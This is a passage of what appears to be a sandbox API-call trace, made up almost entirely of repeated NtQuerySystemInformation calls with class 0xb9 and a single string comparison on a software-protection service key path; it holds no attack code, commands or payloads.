SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0226.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0226.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0226.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0226.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x28, ResultLength=0x0) [0226.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0226.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0226.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0226.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x20, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x20, ResultLength=0x0) [0226.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x20, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x20, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd7c0, Length=0x28, ResultLength=0x0) [0226.544] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0226.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0226.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0226.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0226.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0226.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x28, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0226.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x20, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x20, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x20, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x20, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x28, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0226.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0226.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce00, Length=0x20, ResultLength=0x0) [0226.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0226.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x28, ResultLength=0x0) [0226.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce00, Length=0x20, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd7e0, Length=0x28, ResultLength=0x0) [0226.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.577] 